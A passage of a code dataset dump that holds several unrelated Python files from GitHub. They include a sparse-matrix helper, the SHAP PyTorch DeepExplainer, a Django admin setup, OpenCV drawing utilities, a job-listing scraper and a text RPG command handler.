np.diff(ZZ.toarray(), prepend=ZZ[-1:].toarray(), axis=0) # Functionally equivalent to MATLAB code\n I = np.where(np.any(ZTemp != 0, axis=1))[0]\n INull = np.where(np.all(ZTemp == 0, axis=1))[0]\n if I.size == 0:\n I = 0\n INull = 1\n Z = ZZ[I]\n\n # Constructing permutation matrix\n Ind = Ind[IndSort]\n for i in INull:\n Ind[i - 1, 1] = Ind[i, 1]\n Ind[i, 1] = sizeZ2\n Ind = Ind[I]\n\n # hstack in scipy.sparse\n R1 = hstack([eye(sizeZ1), csr_matrix((sizeZ1, len(I) - sizeZ1))]).tocsr()\n R1 = R1[:, Ind[:, 0]]\n R2 = hstack([eye(sizeZ2), csr_matrix((sizeZ2, len(I) - sizeZ2))]).tocsr()\n R2 = R2[:, Ind[:, 1]]\n\n Z = csr_matrix(Z)\n\n return R1, R2, Z","repo_name":"zm2404/SOSPy","sub_path":"SOSPy/SOSPy/findcommonZ.py","file_name":"findcommonZ.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36532111678","text":"import warnings\n\nimport numpy as np\nfrom packaging import version\n\nfrom .._explainer import Explainer\nfrom .deep_utils import _check_additivity\n\ntorch = None\n\n\nclass PyTorchDeep(Explainer):\n\n def __init__(self, model, data):\n # try and import pytorch\n global torch\n if torch is None:\n import torch\n if version.parse(torch.__version__) < 
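findcommonZ above documents the contract Z1 = R1*Z and Z2 = R2*Z for distinct-row inputs; a toy property check of that contract (the monomial rows are invented for the test, and sparse matrices are used because the routine converts to CSR anyway):

import numpy as np
from scipy.sparse import csr_matrix

Z1 = csr_matrix(np.array([[1, 0], [0, 1]]))
Z2 = csr_matrix(np.array([[0, 1], [1, 1]]))
R1, R2, Z = findcommonZ(Z1, Z2)
assert np.allclose((R1 @ Z).toarray(), Z1.toarray())
assert np.allclose((R2 @ Z).toarray(), Z2.toarray())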
version.parse(\"0.4\"):\n warnings.warn(\"Your PyTorch version is older than 0.4 and not supported.\")\n\n # check if we have multiple inputs\n self.multi_input = False\n if isinstance(data, list):\n self.multi_input = True\n if not isinstance(data, list):\n data = [data]\n self.data = data\n self.layer = None\n self.input_handle = None\n self.interim = False\n self.interim_inputs_shape = None\n self.expected_value = None # to keep the DeepExplainer base happy\n if type(model) == tuple:\n self.interim = True\n model, layer = model\n model = model.eval()\n self.layer = layer\n self.add_target_handle(self.layer)\n\n # if we are taking an interim layer, the 'data' is going to be the input\n # of the interim layer; we will capture this using a forward hook\n with torch.no_grad():\n _ = model(*data)\n interim_inputs = self.layer.target_input\n if type(interim_inputs) is tuple:\n # this should always be true, but just to be safe\n self.interim_inputs_shape = [i.shape for i in interim_inputs]\n else:\n self.interim_inputs_shape = [interim_inputs.shape]\n self.target_handle.remove()\n del self.layer.target_input\n self.model = model.eval()\n\n self.multi_output = False\n self.num_outputs = 1\n with torch.no_grad():\n outputs = model(*data)\n\n # also get the device everything is running on\n self.device = outputs.device\n if outputs.shape[1] > 1:\n self.multi_output = True\n self.num_outputs = outputs.shape[1]\n self.expected_value = outputs.mean(0).cpu().numpy()\n\n def add_target_handle(self, layer):\n input_handle = layer.register_forward_hook(get_target_input)\n self.target_handle = input_handle\n\n def add_handles(self, model, forward_handle, backward_handle):\n \"\"\"\n Add handles to all non-container layers in the model.\n Recursively for non-container layers\n \"\"\"\n handles_list = []\n model_children = list(model.children())\n if model_children:\n for child in model_children:\n handles_list.extend(self.add_handles(child, forward_handle, backward_handle))\n else: # leaves\n handles_list.append(model.register_forward_hook(forward_handle))\n handles_list.append(model.register_full_backward_hook(backward_handle))\n return handles_list\n\n def remove_attributes(self, model):\n \"\"\"\n Removes the x and y attributes which were added by the forward handles\n Recursively searches for non-container layers\n \"\"\"\n for child in model.children():\n if 'nn.modules.container' in str(type(child)):\n self.remove_attributes(child)\n else:\n try:\n del child.x\n except AttributeError:\n pass\n try:\n del child.y\n except AttributeError:\n pass\n\n def gradient(self, idx, inputs):\n self.model.zero_grad()\n X = [x.requires_grad_() for x in inputs]\n outputs = self.model(*X)\n selected = [val for val in outputs[:, idx]]\n grads = []\n if self.interim:\n interim_inputs = self.layer.target_input\n for idx, input in enumerate(interim_inputs):\n grad = torch.autograd.grad(selected, input,\n retain_graph=True if idx + 1 < len(interim_inputs) else None,\n allow_unused=True)[0]\n if grad is not None:\n grad = grad.cpu().numpy()\n else:\n grad = torch.zeros_like(X[idx]).cpu().numpy()\n grads.append(grad)\n del self.layer.target_input\n return grads, [i.detach().cpu().numpy() for i in interim_inputs]\n else:\n for idx, x in enumerate(X):\n grad = torch.autograd.grad(selected, x,\n retain_graph=True if idx + 1 < len(X) else None,\n allow_unused=True)[0]\n if grad is not None:\n grad = grad.cpu().numpy()\n else:\n grad = torch.zeros_like(X[idx]).cpu().numpy()\n grads.append(grad)\n return grads\n\n def 
shap_values(self, X, ranked_outputs=None, output_rank_order=\"max\", check_additivity=True):\n # X ~ self.model_input\n # X_data ~ self.data\n\n # check if we have multiple inputs\n if not self.multi_input:\n assert not isinstance(X, list), \"Expected a single tensor model input!\"\n X = [X]\n else:\n assert isinstance(X, list), \"Expected a list of model inputs!\"\n\n X = [x.detach().to(self.device) for x in X]\n\n model_output_values = None\n\n if ranked_outputs is not None and self.multi_output:\n with torch.no_grad():\n model_output_values = self.model(*X)\n # rank and determine the model outputs that we will explain\n if output_rank_order == \"max\":\n _, model_output_ranks = torch.sort(model_output_values, descending=True)\n elif output_rank_order == \"min\":\n _, model_output_ranks = torch.sort(model_output_values, descending=False)\n elif output_rank_order == \"max_abs\":\n _, model_output_ranks = torch.sort(torch.abs(model_output_values), descending=True)\n else:\n emsg = \"output_rank_order must be max, min, or max_abs!\"\n raise ValueError(emsg)\n model_output_ranks = model_output_ranks[:, :ranked_outputs]\n else:\n model_output_ranks = (torch.ones((X[0].shape[0], self.num_outputs)).int() *\n torch.arange(0, self.num_outputs).int())\n\n # add the gradient handles\n handles = self.add_handles(self.model, add_interim_values, deeplift_grad)\n if self.interim:\n self.add_target_handle(self.layer)\n\n # compute the attributions\n output_phis = []\n for i in range(model_output_ranks.shape[1]):\n phis = []\n if self.interim:\n for k in range(len(self.interim_inputs_shape)):\n phis.append(np.zeros((X[0].shape[0], ) + self.interim_inputs_shape[k][1: ]))\n else:\n for k in range(len(X)):\n phis.append(np.zeros(X[k].shape))\n for j in range(X[0].shape[0]):\n # tile the inputs to line up with the background data samples\n tiled_X = [X[t][j:j + 1].repeat(\n (self.data[t].shape[0],) + tuple([1 for k in range(len(X[t].shape) - 1)])) for t\n in range(len(X))]\n joint_x = [torch.cat((tiled_X[t], self.data[t]), dim=0) for t in range(len(X))]\n # run attribution computation graph\n feature_ind = model_output_ranks[j, i]\n sample_phis = self.gradient(feature_ind, joint_x)\n # assign the attributions to the right part of the output arrays\n if self.interim:\n sample_phis, output = sample_phis\n x, data = [], []\n for k in range(len(output)):\n x_temp, data_temp = np.split(output[k], 2)\n x.append(x_temp)\n data.append(data_temp)\n for t in range(len(self.interim_inputs_shape)):\n phis[t][j] = (sample_phis[t][self.data[t].shape[0]:] * (x[t] - data[t])).mean(0)\n else:\n for t in range(len(X)):\n phis[t][j] = (torch.from_numpy(sample_phis[t][self.data[t].shape[0]:]).to(self.device) * (X[t][j: j + 1] - self.data[t])).cpu().detach().numpy().mean(0)\n output_phis.append(phis[0] if not self.multi_input else phis)\n # cleanup; remove all gradient handles\n for handle in handles:\n handle.remove()\n self.remove_attributes(self.model)\n if self.interim:\n self.target_handle.remove()\n\n # check that the SHAP values sum up to the model output\n if check_additivity:\n if model_output_values is None:\n with torch.no_grad():\n model_output_values = self.model(*X)\n\n _check_additivity(self, model_output_values.cpu(), output_phis)\n\n if not self.multi_output:\n return output_phis[0]\n elif ranked_outputs is not None:\n return output_phis, model_output_ranks\n else:\n return output_phis\n\n# Module hooks\n\n\ndef deeplift_grad(module, grad_input, grad_output):\n \"\"\"The backward hook which computes the 
deeplift\n gradient for an nn.Module\n \"\"\"\n # first, get the module type\n module_type = module.__class__.__name__\n # first, check the module is supported\n if module_type in op_handler:\n if op_handler[module_type].__name__ not in ['passthrough', 'linear_1d']:\n return op_handler[module_type](module, grad_input, grad_output)\n else:\n warnings.warn(f'unrecognized nn.Module: {module_type}')\n return grad_input\n\n\ndef add_interim_values(module, input, output):\n \"\"\"The forward hook used to save interim tensors, detached\n from the graph. Used to calculate the multipliers\n \"\"\"\n try:\n del module.x\n except AttributeError:\n pass\n try:\n del module.y\n except AttributeError:\n pass\n module_type = module.__class__.__name__\n if module_type in op_handler:\n func_name = op_handler[module_type].__name__\n # First, check for cases where we don't need to save the x and y tensors\n if func_name == 'passthrough':\n pass\n else:\n # check only the 0th input varies\n for i in range(len(input)):\n if i != 0 and type(output) is tuple:\n assert input[i] == output[i], \"Only the 0th input may vary!\"\n # if a new method is added, it must be added here too. This ensures tensors\n # are only saved if necessary\n if func_name in ['maxpool', 'nonlinear_1d']:\n # only save tensors if necessary\n if type(input) is tuple:\n setattr(module, 'x', torch.nn.Parameter(input[0].detach()))\n else:\n setattr(module, 'x', torch.nn.Parameter(input.detach()))\n if type(output) is tuple:\n setattr(module, 'y', torch.nn.Parameter(output[0].detach()))\n else:\n setattr(module, 'y', torch.nn.Parameter(output.detach()))\n\n\ndef get_target_input(module, input, output):\n \"\"\"A forward hook which saves the tensor - attached to its graph.\n Used if we want to explain the interim outputs of a model\n \"\"\"\n try:\n del module.target_input\n except AttributeError:\n pass\n setattr(module, 'target_input', input)\n\n\ndef passthrough(module, grad_input, grad_output):\n \"\"\"No change made to gradients\"\"\"\n return None\n\n\ndef maxpool(module, grad_input, grad_output):\n pool_to_unpool = {\n 'MaxPool1d': torch.nn.functional.max_unpool1d,\n 'MaxPool2d': torch.nn.functional.max_unpool2d,\n 'MaxPool3d': torch.nn.functional.max_unpool3d\n }\n pool_to_function = {\n 'MaxPool1d': torch.nn.functional.max_pool1d,\n 'MaxPool2d': torch.nn.functional.max_pool2d,\n 'MaxPool3d': torch.nn.functional.max_pool3d\n }\n delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]\n dup0 = [2] + [1 for i in delta_in.shape[1:]]\n # we also need to check if the output is a tuple\n y, ref_output = torch.chunk(module.y, 2)\n cross_max = torch.max(y, ref_output)\n diffs = torch.cat([cross_max - ref_output, y - cross_max], 0)\n\n # all of this just to unpool the outputs\n with torch.no_grad():\n _, indices = pool_to_function[module.__class__.__name__](\n module.x, module.kernel_size, module.stride, module.padding,\n module.dilation, module.ceil_mode, True)\n xmax_pos, rmax_pos = torch.chunk(pool_to_unpool[module.__class__.__name__](\n grad_output[0] * diffs, indices, module.kernel_size, module.stride,\n module.padding, list(module.x.shape)), 2)\n\n grad_input = [None for _ in grad_input]\n grad_input[0] = torch.where(torch.abs(delta_in) < 1e-7, torch.zeros_like(delta_in),\n (xmax_pos + rmax_pos) / delta_in).repeat(dup0)\n\n return tuple(grad_input)\n\n\ndef linear_1d(module, grad_input, grad_output):\n \"\"\"No change made to gradients.\"\"\"\n return None\n\n\ndef nonlinear_1d(module, grad_input, 
grad_output):\n delta_out = module.y[: int(module.y.shape[0] / 2)] - module.y[int(module.y.shape[0] / 2):]\n\n delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]\n dup0 = [2] + [1 for i in delta_in.shape[1:]]\n # handles numerical instabilities where delta_in is very small by\n # just taking the gradient in those cases\n grads = [None for _ in grad_input]\n grads[0] = torch.where(torch.abs(delta_in.repeat(dup0)) < 1e-6, grad_input[0],\n grad_output[0] * (delta_out / delta_in).repeat(dup0))\n return tuple(grads)\n\n\nop_handler = {}\n\n# passthrough ops, where we make no change to the gradient\nop_handler['Dropout3d'] = passthrough\nop_handler['Dropout2d'] = passthrough\nop_handler['Dropout'] = passthrough\nop_handler['AlphaDropout'] = passthrough\n\nop_handler['Conv1d'] = linear_1d\nop_handler['Conv2d'] = linear_1d\nop_handler['Conv3d'] = linear_1d\nop_handler['ConvTranspose1d'] = linear_1d\nop_handler['ConvTranspose2d'] = linear_1d\nop_handler['ConvTranspose3d'] = linear_1d\nop_handler['Linear'] = linear_1d\nop_handler['AvgPool1d'] = linear_1d\nop_handler['AvgPool2d'] = linear_1d\nop_handler['AvgPool3d'] = linear_1d\nop_handler['AdaptiveAvgPool1d'] = linear_1d\nop_handler['AdaptiveAvgPool2d'] = linear_1d\nop_handler['AdaptiveAvgPool3d'] = linear_1d\nop_handler['BatchNorm1d'] = linear_1d\nop_handler['BatchNorm2d'] = linear_1d\nop_handler['BatchNorm3d'] = linear_1d\n\nop_handler['LeakyReLU'] = nonlinear_1d\nop_handler['ReLU'] = nonlinear_1d\nop_handler['ELU'] = nonlinear_1d\nop_handler['Sigmoid'] = nonlinear_1d\nop_handler[\"Tanh\"] = nonlinear_1d\nop_handler[\"Softplus\"] = nonlinear_1d\nop_handler['Softmax'] = nonlinear_1d\n\nop_handler['MaxPool1d'] = maxpool\nop_handler['MaxPool2d'] = maxpool\nop_handler['MaxPool3d'] = maxpool\n","repo_name":"shap/shap","sub_path":"shap/explainers/_deep/deep_pytorch.py","file_name":"deep_pytorch.py","file_ext":"py","file_size_in_byte":15383,"program_lang":"python","lang":"en","doc_type":"code","stars":20538,"dataset":"github-code","pt":"68"} +{"seq_id":"23984859470","text":"from django.contrib import admin\nfrom .models import *\n# Register your models here.\n\nadmin.site.site_header = 'Fruit Shop Admin'\nadmin.site.index_title = 'Main Admin'\nadmin.site.site_title = 'Fruit Shop Backend'\n\n\nclass AllProductAdmin(admin.ModelAdmin):\n list_display = ['name', 'price', 'quantity', 'instock']\n list_editable = ['price', 'quantity', 'instock']\n list_filter = ['instock']\n search_fields = ['name']\n\n\nadmin.site.register(AllProduct, AllProductAdmin)\nadmin.site.register(Profile)\nadmin.site.register(Cart)\n\n\nclass OrderListAdmin(admin.ModelAdmin):\n list_display = ['orderId', 'productName', 'total']\n\n\nadmin.site.register(OrderList, OrderListAdmin)\n\n\nclass OrderPendingAdmin(admin.ModelAdmin):\n list_display = ['orderId', 'user', 'paid', 'slip']\n list_filter = ['paid']\n\n\nadmin.site.register(OrderPending, OrderPendingAdmin)\n","repo_name":"plewwoo/fruit-shop","sub_path":"myapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7061364691","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimport math\n\n# logging\nfrom logging import getLogger, NullHandler\nlogger = getLogger(__name__)\nlogger.addHandler(NullHandler())\n\n# matplotlib\ntry:\n import matplotlib\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\n import matplotlib.backends.backend_agg as 
agg\nexcept Exception as e:\n logger.error('Failed to import matplotlib')\n logger.error('[%s] %s', str(type(e)), str(e.args))\n exit()\n\n\ndef _draw_line(img, pt1, pt2, color, thickness=2):\n pt1 = (int(pt1[0]), int(pt1[1]))\n pt2 = (int(pt2[0]), int(pt2[1]))\n cv2.line(img, pt1, pt2, color, int(thickness))\n\n\ndef _draw_circle(img, pt, color, radius=4, thickness=-1):\n pt = (int(pt[0]), int(pt[1]))\n cv2.circle(img, pt, radius, color, int(thickness))\n\n\ndef _draw_rect(img, rect, color, thickness=2):\n p1 = (int(rect[0]), int(rect[1]))\n p2 = (int(rect[0] + rect[2]), int(rect[1] + rect[3]))\n cv2.rectangle(img, p1, p2, color, thickness)\n\n\ndef _draw_cross(img, pt, color, size=4, thickness=2):\n p0 = (pt[0] - size, pt[1] - size)\n p1 = (pt[0] + size, pt[1] + size)\n p2 = (pt[0] + size, pt[1] - size)\n p3 = (pt[0] - size, pt[1] + size)\n _draw_line(img, p0, p1, color, thickness)\n _draw_line(img, p2, p3, color, thickness)\n\n\ndef _rotation_matrix(rad_x, rad_y, rad_z):\n cosx, cosy, cosz = math.cos(rad_x), math.cos(rad_y), math.cos(rad_z)\n sinx, siny, sinz = math.sin(rad_x), math.sin(rad_y), math.sin(rad_z)\n rotz = np.array([[cosz, -sinz, 0],\n [sinz, cosz, 0],\n [0, 0, 1]], dtype=np.float32)\n roty = np.array([[cosy, 0, siny],\n [0, 1, 0],\n [-siny, 0, cosy]], dtype=np.float32)\n rotx = np.array([[1, 0, 0],\n [0, cosx, -sinx],\n [0, sinx, cosx]], dtype=np.float32)\n return rotx.dot(roty).dot(rotz)\n\n\ndef _project_plane_yz(vec):\n x = vec.dot(np.array([0, 1, 0], dtype=np.float32))\n y = vec.dot(np.array([0, 0, 1], dtype=np.float32))\n return np.array([x, -y], dtype=np.float32) # y flip\n\n\ndef draw_detection(img, detection, size=15):\n # Upper left\n pt = (size + 5, size + 5)\n if detection:\n _draw_circle(img, pt, (0, 0.7, 0), size, 5)\n else:\n _draw_cross(img, pt, (0, 0, 0.7), size, 5)\n\n\ndef draw_landmark(img, landmark, visibility, color, line_color_scale,\n denormalize_scale=True):\n \"\"\" Draw AFLW 21 points landmark\n 0|LeftBrowLeftCorner\n 1|LeftBrowCenter\n 2|LeftBrowRightCorner\n 3|RightBrowLeftCorner\n 4|RightBrowCenter\n 5|RightBrowRightCorner\n 6|LeftEyeLeftCorner\n 7|LeftEyeCenter\n 8|LeftEyeRightCorner\n 9|RightEyeLeftCorner\n 10|RightEyeCenter\n 11|RightEyeRightCorner\n 12|LeftEar\n 13|NoseLeft\n 14|NoseCenter\n 15|NoseRight\n 16|RightEar\n 17|MouthLeftCorner\n 18|MouthCenter\n 19|MouthRightCorner\n 20|ChinCenter\n \"\"\"\n conn_list = [[0, 1], [1, 2], [3, 4], [4, 5], # brow\n [6, 7], [7, 8], [9, 10], [10, 11], # eye\n [13, 14], [14, 15], [13, 15], # nose\n [17, 18], [18, 19], # mouse\n [12, 20], [16, 20]] # face contour\n\n if landmark.ndim == 1:\n landmark = landmark.reshape(int(landmark.shape[-1] / 2), 2)\n assert(landmark.shape[0] == 21 and visibility.shape[0] == 21)\n\n if denormalize_scale:\n h, w = img.shape[0:2]\n size = np.array([[w, h]], dtype=np.float32)\n landmark = landmark * size + size / 2\n\n # Line\n line_color = tuple(v * line_color_scale for v in color)\n for i0, i1 in conn_list:\n if visibility[i0] > 0.5 and visibility[i1] > 0.5:\n _draw_line(img, landmark[i0], landmark[i1], line_color, 2)\n\n # Point\n for pt, visib in zip(landmark, visibility):\n if visib > 0.5:\n _draw_circle(img, pt, color, 4, -1)\n else:\n _draw_circle(img, pt, color, 4, 1)\n\n\ndef draw_pose(img, pose, size=30, idx=0):\n # parallel projection (something wrong?)\n rotmat = _rotation_matrix(-pose[0], -pose[1], -pose[2])\n zvec = np.array([0, 0, 1], np.float32)\n yvec = np.array([0, 1, 0], np.float32)\n xvec = np.array([1, 0, 0], np.float32)\n zvec = 
_project_plane_yz(rotmat.dot(zvec))\n    yvec = _project_plane_yz(rotmat.dot(yvec))\n    xvec = _project_plane_yz(rotmat.dot(xvec))\n\n    # Lower left\n    org_pt = ((size + 5) * (2 * idx + 1), img.shape[0] - size - 5)\n    _draw_line(img, org_pt, org_pt + zvec * size, (1, 0, 0), 3)\n    _draw_line(img, org_pt, org_pt + yvec * size, (0, 1, 0), 3)\n    _draw_line(img, org_pt, org_pt + xvec * size, (0, 0, 1), 3)\n\n\ndef draw_gender(img, gender, size=7, idx=0):\n    # Upper right\n    pt = (img.shape[1] - (size + 5) * (2 * idx + 1), size + 5)\n    if gender == 0:\n        _draw_circle(img, pt, (1.0, 0.3, 0.3), size, -1)  # male\n    elif gender == 1:\n        _draw_circle(img, pt, (0.3, 0.3, 1.0), size, -1)  # female\n\n\ndef draw_gender_rect(img, gender, rect):\n    if gender == 0:\n        _draw_rect(img, rect, (1.0, 0.3, 0.3))  # male\n    elif gender == 1:\n        _draw_rect(img, rect, (0.3, 0.3, 1.0))  # female\n\n\ndef draw_loss_graph(train_loss_list, test_loss_list, train_epoch_list=None,\n                    test_epoch_list=None, train_color='blue', test_color='red',\n                    legend_loc='upper right', title=None):\n    # Axis data\n    # Losses\n    train_loss = np.asarray(train_loss_list)\n    test_loss = np.asarray(test_loss_list)\n    # Epochs\n    if train_epoch_list:\n        train_epoch = np.asarray(train_epoch_list)\n    else:\n        train_epoch = np.arange(0, len(train_loss_list))\n    if test_epoch_list:\n        test_epoch = np.asarray(test_epoch_list)\n    else:\n        test_epoch = np.arange(0, len(test_loss_list))\n\n    # Create new figure\n    plt.clf()\n    fig, ax = plt.subplots()\n    ax.plot(train_epoch, train_loss, label='train', color=train_color)\n    ax.plot(test_epoch, test_loss, label='test', color=test_color)\n\n    def draw_annotate(label, x, y, color):\n        ax.scatter(x, y, 20, color=color)\n        ax.annotate(label, xy=(x, y), xytext=(+20, +10),\n                    textcoords='offset points',\n                    arrowprops={'arrowstyle': '->',\n                                'connectionstyle': 'arc3,rad=.2'})\n\n    # Show min values\n    if train_loss.shape[0] > 0:\n        min_idx = np.argmin(train_loss)\n        x, y = train_epoch[min_idx], train_loss[min_idx]\n        draw_annotate('min train loss: %0.3f' % y, x, y, train_color)\n    if test_loss.shape[0] > 0:\n        min_idx = np.argmin(test_loss)\n        x, y = test_epoch[min_idx], test_loss[min_idx]\n        draw_annotate('min test loss: %0.3f' % y, x, y, test_color)\n\n    # Settings\n    ax.set_xlabel(\"epoch\")\n    ax.set_ylabel(\"loss rate\")\n    ax.set_xlim(left=0)\n    ax.set_ylim(bottom=0)\n    ax.legend(loc=legend_loc)\n    if title is not None:\n        ax.set_title(title)\n\n    # Draw\n    canvas = agg.FigureCanvasAgg(fig)\n    canvas.draw()\n    renderer = canvas.get_renderer()\n    # np.fromstring is deprecated for binary input; np.frombuffer reads the\n    # rendered RGB bytes directly (reshape below returns a fresh array)\n    img = np.frombuffer(renderer.tostring_rgb(), dtype=np.uint8)\n    img = img.reshape(canvas.get_width_height()[::-1] + (3,))\n\n    # Close\n    plt.close('all')\n\n    return img\n","repo_name":"takiyu/hyperface","sub_path":"scripts/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"68"}
+{"seq_id":"39611341226","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport click\nimport requests\nimport sqlalchemy\nimport xlsxwriter\nfrom bs4 import BeautifulSoup\nfrom sqlalchemy import create_engine, delete, insert, select\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.session import Session, sessionmaker\nfrom unidecode import unidecode\n\nfrom models import Base, JobModel\n\n\nAPP_DIR = Path(__file__).parent\nlog = logging.getLogger()\n\n\n@click.command()\n@click.option(\n    \"--keyword\",\n    default=\"python fejlesztő\",\n    help=\"the search 
term. can be multiple words\",\n)\n@click.option(\n \"--output\",\n default=\"profession_hu_jobs__\"\n + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"_\").replace(\".\", \"_\"),\n help=\"output file name\",\n)\n@click.option(\"--pages-to-check\", default=50, help=\"number of pages to check\")\n@click.option(\n \"--save-to-xlsx\", default=False, show_default=True, help=\"save to excel sheet\"\n)\ndef main(output, pages_to_check, save_to_xlsx, keyword):\n my_jobs_data = search_and_process(pages_to_check, keyword)\n if save_to_xlsx:\n export_to_xlsx(my_jobs_data, output)\n save_to_db(my_jobs_data, output, keyword)\n\n\ndef search_and_process(pages, keyword):\n keyword = \"\".join([c if c != \" \" else \"%20\" for c in keyword])\n page_number = 1\n\n positions = []\n urls = []\n companies = []\n addresses = []\n salaries = []\n added_ats = []\n\n print(\"collecting data: \", end=\"\", flush=True)\n log.info(\"data collection started\")\n\n while page_number <= pages:\n url = f\"https://www.profession.hu/allasok/{page_number},0,0,{keyword}%401%401?keywordsearch\"\n log.info(f\"url: {unidecode(url)}\")\n\n print(\".\", end=\"\", flush=True)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n all_cards = soup.find_all(class_=\"card\")\n\n for card in all_cards:\n try:\n position = card.find(class_=\"job-card__title\").get_text().strip()\n url = card.select(\"h2 a\")\n\n company = (\n card.find(class_=\"job-card__company-name\")\n .get_text()\n .strip()\n .replace('\"', \"\")\n )\n\n address = (\n card.find(class_=\"job-card__company-address\").get_text().strip()\n )\n\n salary = card.select(\".bonus_salary > dd:nth-child(2)\")\n if salary:\n salary = salary[0].text\n else:\n salary = \"\"\n\n added_at = (\n str(datetime.now())\n .replace(\" \", \"_\")\n .replace(\":\", \"_\")\n .replace(\".\", \"_\")\n )\n\n if company.lower() not in [\n \"randstad hungary kft.\",\n \"tech people hungary kft.\",\n ]:\n positions.append(position.splitlines()[0])\n urls.append(url[0][\"href\"])\n companies.append(company)\n addresses.append(address)\n salaries.append(salary)\n added_ats.append(added_at)\n\n except:\n continue\n\n page_number += 1\n log.info(\"page parsed\")\n\n jobs_data = {\n \"positions\": positions,\n \"urls\": urls,\n \"companies\": companies,\n \"addresses\": addresses,\n \"salaries\": salaries,\n \"added_ats\": added_ats,\n }\n\n return jobs_data\n\n\ndef export_to_xlsx(jobs_data, output):\n log.info(\"export to xlsx started\")\n out_file = f\"{output}.xlsx\"\n\n print(f\"creating excel file: {out_file} ->\", end=\" \")\n headers = [\"position\", \"company\", \"address\", \"salary\", \"url\"]\n\n wb = xlsxwriter.Workbook(out_file)\n ws = wb.add_worksheet()\n ws.set_column(\"A:C\", 35)\n ws.set_column(\"D:E\", 12)\n ws.set_default_row(20)\n ws.set_zoom(100)\n row = 1\n\n cf = wb.add_format()\n cf.set_font_size(10)\n cf.set_align(\"vcenter\")\n cf.set_bold(True)\n\n for i in range(len(headers)):\n ws.write_string(0, i, headers[i], cf)\n\n for x in range(len(jobs_data[\"positions\"])):\n cf = wb.add_format()\n cf.set_font_size(9)\n cf.set_align(\"vcenter\")\n\n ws.write_string(row, 0, jobs_data[\"positions\"][x], cf)\n ws.write_string(row, 1, jobs_data[\"companies\"][x], cf)\n ws.write_string(row, 2, jobs_data[\"addresses\"][x], cf)\n ws.write_string(row, 3, jobs_data[\"salaries\"][x], cf)\n ws.write_url(row, 4, jobs_data[\"urls\"][x], cf, string=jobs_data[\"urls\"][x])\n row += 1\n wb.close()\n log.info(\"export to xlsx done\")\n\n\ndef 
save_to_db(jobs_data, output, keyword):\n my_sqlops = SqlOps(jobs_data, keyword)\n my_sqlops.sql_add()\n\n\nclass SqlOps(object):\n def __init__(\n self,\n jobs_data,\n keyword,\n ):\n self.conn_string = f\"sqlite:///{keyword}.sqlite3\"\n self.engine = create_engine(self.conn_string)\n self.jobs_data = jobs_data\n\n def sql_add(self):\n Base.metadata.create_all(self.engine)\n\n new_jobs = []\n rollback = False\n for i in range(0, len(self.jobs_data[\"positions\"])):\n try:\n\n Session = sessionmaker(bind=self.engine)\n session = Session()\n\n job = JobModel(\n position=self.jobs_data[\"positions\"][i],\n company=self.jobs_data[\"companies\"][i],\n address=self.jobs_data[\"addresses\"][i],\n salary=self.jobs_data[\"salaries\"][i],\n url=self.jobs_data[\"urls\"][i],\n added_at=self.jobs_data[\"added_ats\"][i],\n )\n session.add(job)\n session.commit()\n except IntegrityError as e:\n log.error(e)\n session.rollback()\n rollback = True\n finally:\n session.close()\n\n if not rollback:\n new_jobs.append(\n [\n self.jobs_data[\"positions\"][i],\n self.jobs_data[\"companies\"][i],\n self.jobs_data[\"addresses\"][i],\n self.jobs_data[\"salaries\"][i],\n self.jobs_data[\"urls\"][i],\n self.jobs_data[\"added_ats\"][i],\n ]\n )\n\n print(\"\\nnew jobs:\")\n for new_job in new_jobs:\n print(\"new job:\", new_job)\n\n\nif __name__ == \"__main__\":\n handler = logging.FileHandler(APP_DIR / \"scraper.log\")\n formatter = logging.Formatter(\"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\")\n handler.setFormatter(formatter)\n log.addHandler(handler)\n log.setLevel(logging.DEBUG)\n\n main()\n","repo_name":"polyspastos/profession_hu_scraper","sub_path":"profession_hu_scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74895906135","text":"from main import *\nfrom items import *\nfrom skills import *\nfrom mobs import *\nimport random\n\nlowkey_lvl = 0\n\n\n# Basic commands\ndef commands(comm):\n global lowkey_lvl\n if in_battle == 0:\n if comm == \"inventory\" or comm == \"inv\":\n check_inv()\n elif comm == \"skill\" or comm == \"skills\":\n check_skill()\n elif comm == \"stats\" or comm == \"stat\":\n check_stats()\n elif comm == \"equip\" or comm == \"eq\":\n equip()\n # DELETE LVLUP COMM\n elif comm == \"lvlup\":\n if int(p_exp) >= int(level_threshold[lowkey_lvl]):\n lowkey_lvl += 1\n print(\"LEVEL UP!\")\n lvlup()\n print(\"\")\n else:\n print(f\"You need {int(level_threshold[lowkey_lvl]) - int(p_exp)} more EXP to level up!\")\n print(\"\")\n elif comm == \"battle\":\n battle()\n elif comm == \"randomloot\":\n randomloot()\n elif comm == \"uskill\":\n use_skill()\n elif comm == \"sell\":\n sell()\n elif comm == \"show\":\n show()\n elif comm == \"info\":\n info()\n elif comm == \"about\":\n about()\n\n\n# Check inventory\ndef check_inv():\n i = 0\n for item in inventory:\n print(f\"{i}. 
